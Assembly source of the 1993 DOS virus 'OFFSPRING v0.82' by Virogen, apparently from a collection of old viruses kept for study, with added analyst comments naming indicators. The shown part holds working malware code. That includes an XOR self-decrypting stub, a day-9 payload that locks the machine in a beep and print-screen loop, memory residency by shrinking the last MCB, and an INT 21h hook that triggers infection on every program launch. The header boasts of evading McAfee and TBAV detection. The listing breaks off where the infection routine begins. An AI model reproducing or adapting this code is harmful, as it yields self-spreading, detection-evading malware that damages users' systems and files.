
📄 offspr82.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
;-------------------------------------------------------------------------
; ************************************************
;     OFFSPRING v0.82 - BY VIROGEN - 09-06-93
; ************************************************
;
;  - Compatible with : TASM /m2
;
;  TYPE : Parasitic & Spawning Resident Encrypting (PSRhA)
;
;
;  VERSION : 0.82
;            - No longer detectable by Mcafee SCAN as anything.
;            - No longer detectable by TBAV heuristics.
;
;
;  INFECTION METHOD :  Every time DOS function 4Bh (Execute File)
;                      is called the virus will infect up to 5 files
;                      in the current directory. It will first infect all
;                      EXE files by creating a corresponding COM. Once
;                      all EXE files have been infected, it then infects
;                      COM files. All COM files created by a spawning
;                      infection will have the read-only and hidden
;                      attribute.
;
;
;  THE ENCRYPTION OF THIS VIRUS :
;                      Ok, this virus's encryption method is a simple
;                      XOR. The encryption operands are changed directly.
;                      Also, the operands are switched around, and the
;                      encryption routine switches from using di to si.
;                      Not anything overly amazing, but it works.
;
;
;
;
	    ; Assembly set-up for this listing: 80286 instruction set, one
	    ; segment with CS=DS=SS=ES, origin 100h (DOS .COM layout, PSP below).
	    title   offspring_1
	    .286
cseg	    segment
	    assume  cs: cseg, ds: cseg, ss: cseg, es: cseg

; Residency handshake. The installer issues INT 21h with AH=signal and
; treats AH=reply on return as "a resident copy is already present"; the
; hooked INT 21h handler is the code that rewrites AH. For an analyst the
; AH=7Dh -> AH=0FCh pair is a behavioural indicator of the resident copy.
signal	    equ	    7dh			    ; Installation check
reply	    equ	    0fch		    ; reply to check
; Field offsets inside the DOS find-first/find-next (FF/FN) buffer.
; Their uses lie outside this part of the listing.
f_name	    equ	    1eh			    ; Offset of file name in FF/FN buffer
f_sizel	    equ	    1ch			    ; File size - low - loc in mem
f_sizeh	    equ	    1ah			    ; File size - high - loc in mem
f_date	    equ	    18h			    ; File date - loc in mem
f_time	    equ	    16h			    ; File time - loc in mem
; Per-activation limit; matches the "up to 5 files" in the header comment.
max_inf	    equ	    05			    ; Maximum files to infect per run
max_rotation equ    9			    ; number of bytes in switch byte table
; Values compared against the vtype byte in main to pick how the host
; program is resumed.
parastic    equ	    01			    ; Parastic infection
spawn	    equ	    00			    ; Spawning infection

	    org	    100h		    ; Leave room for PSP

;------------------------------------------------------------------
; Start of viral code
;------------------------------------------------------------------

; Entry point and decryption stub.
; The word count loaded into CX is (vend - enc_data)/2, so the XOR loop
; covers the region from the enc_data label up to vend; the stub itself
; lies before enc_data. Several bytes below are data that execute as
; instructions and are rewritten at run time, so the exact byte layout is
; part of the logic and must not be reflowed.
; Analyst note: per the author's header comments the XOR operand, the
; index register (DI/SI) and the position of INC inside the NOP padding
; differ between copies, so exact-byte matching on this stub is brittle.
; The stable part is its shape: load pointer, load word count, XOR a
; word, advance the pointer by two, LOOP.
start:

            skip_dec:
	    jmp	    main		    ; Skip decryption, changes into NOP on
	    	    			    ; replicated copies.
	    ; 0BFh is the opcode byte of MOV DI,imm16; together with the word
	    ; that follows it forms "MOV DI,<pointer into enc_data>".
	    di_op   db 0bfh
	    mov_di  dw offset enc_data+2    ; Point to byte after encryption num
	    	    			    ;
;-------------------------
; Encryption/Decryption

encrypt:
; 90h is NOP and 0B9h is the opcode byte of MOV CX,imm16; b_wr is that
; instruction's immediate, i.e. the number of 16-bit words to process.
cx_m	    db	    90h,0b9h		    ; MOV CX
b_wr	    dw	    (offset vend-offset enc_data)/2
xor_loop:
	    xor_op: xor word ptr [di],0666h ; Xor each word - number changes accordingly
	    ; Two INC + NOP,NOP groups advance the pointer by one word per
	    ; iteration; the padding gives the INC room to move (see label comment).
	    sw_byte3: 			    ; INC xx changes position in these bytes
	    inc	    di
            nop
	    nop
	    sw_byte4:
	    inc	    di
	    nop
	    nop
	    loop    xor_loop		    ; loop while cx != 0

            ; As NOP (90h) execution falls through into enc_data; as RET
            ; (0C3h) the block from encrypt onward returns to its caller.
            ret_byte db 90h                 ; Changes to RET (0C3h) - then back to NOP

enc_data:   	    			    ; Start of encrypted data

;-------------------------------
;  Non-Resident portion of virus
;-------------------------------
; main - code that runs inside the launched program (non-resident part).
; Flow, as visible in this listing:
;   1. BP is loaded with a per-copy offset (the "delta"); every variable
;      is then addressed as name[bp].
;   2. The EXEC parameter block is filled with the environment segment
;      read from PSP:002Ch and with CS.
;   3. Date check: when the day of month is 9 the payload loop below runs
;      and never exits, so the host program does not start on that day.
;   4. Otherwise install is called and control passes to the host:
;      - vtype = parastic: the six saved bytes at org_bytes are copied
;        back to 0100h and execution continues there;
;      - otherwise (spawned copy): memory is shrunk, the file named at
;        file_dir-1 is run through INT 21h AX=4B00h, then the process exits.
; Analyst note: user-visible symptoms of the payload are the message at
; vname, repeated print-screen requests, the bell character written to
; the screen and a changing keyboard-flag word.
main	    proc

            ; 0BDh is the opcode byte of MOV BP,imm16; the word at set_bp is
            ; its immediate (0000 here; presumably patched per copy by code
            ; outside this part of the listing).
            db      0bdh                    ; MOV BP,xxxx - Load delta offset
            set_bp:
            dw      0000

            mov     word ptr skip_dec[bp],9090h ; NOP the jump past decryption

	    mov	    ax,ds: 002ch	    ; Get environment address
            mov     par_blk[bp],ax          ; Save in parameter block for exec

            mov     par1[bp],cs             ; Save segments for EXEC
            mov     par2[bp],cs
            mov     par_seg[bp],cs

	    mov	    ah,2ah		    ; Get date
	    int	    21h

	    ; DL is tested against 9; the original comment identifies it as
	    ; the day of the month.
	    cmp	    dl,9		    ; 9th?
	    jne	    no_display

	    mov	    ah,09		    ; display virus name
	    lea	    dx,vname[bp]
	    int	    21h

	    ; Payload loop. There is no exit: the only branch at the bottom is
	    ; an unconditional jump back to chg_lights.
	    xor	    ax,ax		    ; seg 0
	    mov	    es,ax
	    mov	    dx,1010101010101010b    ; lights
	    chg_lights: 		    ; Infinite loop to change keyboard
	    mov	    word ptr es: [416h],dx  ; 0040:0016h = keyb flags
	    ror	    dx,1		    ; rotate bits
	    mov	    cx,0101h		    ; scan code/ascii
	    mov	    ah,05h		    ; push a beep onto keyb buf
	    int	    16h
	    mov	    ah,10h		    ; Read key back so we don't fill
	    int	    16h			    ; up the keyboard buffer
	    int	    5h			    ; Print-Screen
	    mov	    ax,0a07h		    ; Write BEEP to screen
	    xor	    bh,bh
	    mov	    cx,1
	    int	    10h
	    mov	    ah,86h		    ; Delay
	    mov	    cx,0002h
	    int	    15h

	    jmp	    chg_lights

	    no_display:

	    call    install		    ; check if installed, if not install

	    ; vtype selects how the host is resumed (parastic = 01, spawn = 00).
	    cmp	    byte ptr vtype[bp],parastic
	    je	    com_return

	    ; Spawned-copy path: shrink this program's memory block to
	    ; (vend+50)/16 + 1 paragraphs so the EXEC below has room.
	    mov	    bx,(offset vend+50)	    ; Calculate memory needed
	    mov	    cl,4		    ; divide by 16
	    shr	    bx,cl
	    inc	    bx
	    mov	    ah,4ah
	    int	    21h			    ; Release un-needed memory

	    lea	    dx,file_dir-1[bp]	    ; Execute the original EXE
	    lea	    bx,par_blk[bp]
	    ; CH=0FBh is the marker the resident handler tests for before it
	    ; acts on an AX=4B00h request; with it set the request is passed on.
            mov     ch,0FBh                 ; tell mem. resident virus
            mov     ax,4b00h                ; that it's us.
	    int	    21h

	    mov	    ah,4ch		    ; Exit
	    int	    21h

	    ; Parasitic path: put the host's original first six bytes back at
	    ; CS:0100h, then transfer control there with a pushed return address.
	    com_return:

	    mov	    si,bp
            mov     cx,6                    ; Restore original first
            add     si,offset org_bytes     ; six bytes of COM file
	    mov	    di,0100h
	    cld
	    rep	    movsb

	    mov	    ax,0100h		    ; Simulate CALL return to 0100h
	    push    ax
	    ret

main	    endp

;--------------------------------------
; INSTALL - Install the virus
;--------------------------------------

; install - make the code resident unless a resident copy answers.
; In:    BP = delta offset set up by main.
;        ES = base segment for the target computation (presumably still
;             the PSP segment DOS set at program start - confirm).
; Out:   DS = ES = CS on every path.
; Clobb: AX, BX, CX, SI, DI, flags.
; Steps visible here:
;   1. Handshake: INT 21h with AH=signal; AH=reply on return skips the rest.
;   2. The memory control block (MCB) one paragraph below CS must be
;      marked 'Z' (last in the chain), otherwise nothing is installed.
;   3. That block's size field is reduced by 190 paragraphs (3040 bytes).
;   4. vend-start bytes are copied to offset 100h of the segment at
;      ES + new block size.
;   5. The INT 21h vector at 0:84h/0:86h is saved into old21_ofs/old21_seg
;      of the copy and replaced with <copy segment>:new21, with interrupts
;      disabled during the two-word write.
; Analyst note: the observable residency artefacts are therefore a last
; MCB that is 190 paragraphs smaller than allocated and an INT 21h vector
; whose segment lies at the top of that shrunken block's former range.
install	    proc

	    mov	    ah,signal
	    int	    21h
	    cmp	    ah,reply
	    je	    no_install

	    mov	    ax,cs
	    dec	    ax
	    mov	    ds,ax
	    cmp	    byte ptr ds: [0],'Z'    ;Is this the last MCB in
	    	    			    ;the chain?
	    jne	    no_install


	    mov	    ax,ds: [3]		    ;Block size in MCB
	    sub	    ax,190		    ;Shrink Block Size-quick estimate
	    mov	    ds: [3],ax

	    mov	    bx,ax
	    mov	    ax,es
	    add	    ax,bx
	    mov	    es,ax		    ;Find high memory seg

	    ; Source is DS:BP+100h. DS was CS-1 (the MCB) and is stepped back
	    ; up by one paragraph before the copy.
	    mov	    si,bp
	    add	    si,0100h
	    mov	    cx,(offset vend - offset start)
	    mov	    ax,ds
	    inc	    ax
	    mov	    ds,ax
	    mov	    di,100h		    ; New location in high memory
	    cld
	    rep	    movsb		    ; Copy virus to high memory

	    ; DS = segment of the copy, ES = 0 (interrupt vector table).
	    ; No [bp] from here on: the copy sits at the assembled offsets.
	    push    es
	    pop	    ds
	    xor	    ax,ax
	    mov	    es,ax		    ; null es
	    mov	    ax,es: [21h*4+2]
	    mov	    bx,es: [21h*4]
	    mov	    ds: old21_seg,ax	    ; Store segment
	    mov	    ds: old21_ofs,bx	    ; Store offset

	    cli

	    mov	    es: [21h*4+2],ds	    ; Save seg
	    lea	    ax, new21
	    mov	    es: [21h*4],ax	    ; off

	    sti

	    no_install:
	    push    cs			    ; Restore regs
	    pop	    ds
	    push    cs
	    pop	    es

	    ret
install	    endp

;--------------------------------------------------------------------
; INT 21h
;---------------------------------------------------------------------

; new21 - replacement INT 21h handler installed by install.
; Every request ends at end_21, a far jump to the previous handler whose
; target words (old21_ofs/old21_seg) were filled in by install.
; Dispatch, as visible here:
;   AH = signal            -> AH is changed to reply, then passed on.
;   AX = 4B00h, CH = 0FBh  -> passed on untouched (request issued by the
;                             spawned stub in main).
;   AX = 4B00h otherwise   -> registers saved, the caller's DTA address
;                             saved, resident called, DTA and registers
;                             restored, then passed on.
;   anything else          -> passed on untouched.
; The handler's own INT 21h calls (AH=2Fh, AH=1Ah) re-enter new21 and
; take the "anything else" path.
; Analyst note: the behaviour to monitor is file activity triggered from
; inside an EXEC (AX=4B00h) request before the requested program starts.
new21	    proc    			    ; New INT 21H handler

	    cmp	    ah, signal		    ; signaling us?
	    jne	    no
	    mov	    ah,reply		    ; yep, give our offspring what he wants
	    jmp	    end_21
	    no:
            cmp     ax,4b00h                ; exec func?
            je      exec_func

            jmp     end_21

            exec_func:
            cmp     ch,0FBh
            je      end_21
            run_res:
	    pushf
	    push    ax			    ; Push regs
	    push    bx
	    push    cx
	    push    dx
	    push    di
	    push    si
	    push    bp
	    push    ds
	    push    es
	    push    sp
	    push    ss

	    ; DS = resident segment, so variables are addressed without [bp].
	    push    cs
	    pop	    ds

	    xor	    ax,ax		    ; nullify ES
	    mov	    es,ax

	    cmp	    byte ptr add_mem,1	    ; Restore system conventional mem size?
	    je	    rel_mem		    ;
	    ; NOTE(analysis): AX was cleared by the XOR above, so AH is 0 at
	    ; this compare and the set_mem branch is not taken from here as
	    ; written. Unless add_mem starts out as 1 (its initial value is
	    ; not visible here), the word at 0:413h stays unchanged and is
	    ; not a dependable indicator.
	    cmp	    ah,48h		    ; alloc. mem block? If so we subtract 3k from
	    je	    set_mem		    ; total system memory.

	    jmp	    no_mem_func

	    set_mem:
	    sub	    word ptr es: [413h],3   ; Subtract 3k from total sys mem
	    inc	    byte ptr add_mem	    ; make sure we know to add this back
	    jmp	    no_mem_func
	    rel_mem:
	    add	    word ptr es: [413h],3   ; Add 3k to total sys mem
	    dec	    byte ptr add_mem


	    no_mem_func:
	    mov	    ah,2fh
	    int	    21h			    ; Get the DTA

	    ; ES:BX from the call above is stored as offset, then segment.
	    mov	    ax,es
	    mov	    word ptr old_dta,bx
	    mov	    word ptr old_dta+2,ax
	    push    cs
	    pop	    es

	    call    resident		    ; Call infection kernal

	    mov	    dx,word ptr old_dta
	    mov	    ax,word ptr old_dta+2
	    mov	    ds,ax
	    mov	    ah,1ah
	    int	    21h			    ; Restore the DTA

	    pop	    ss			    ; Pop regs
	    pop	    sp
	    pop	    es
	    pop	    ds
	    pop	    bp
	    pop	    si
	    pop	    di
	    pop	    dx
	    pop	    cx
	    pop	    bx
	    pop	    ax
	    popf
	    end_21  :
	    ; 0EAh is the opcode byte of JMP FAR ptr16:16; the two words that
	    ; follow are its offset and segment operands.
	    db	    0eah		    ; jump to original int 21h
old21_ofs   dw	    0			    ; Offset of old INT 21H
old21_seg   dw	    0			    ; Seg of old INT 21h
new21	    endp    			    ; End of handler

;------------------------
; Resident - This is called from the INT 21h handler
;-----------------------------
resident    proc
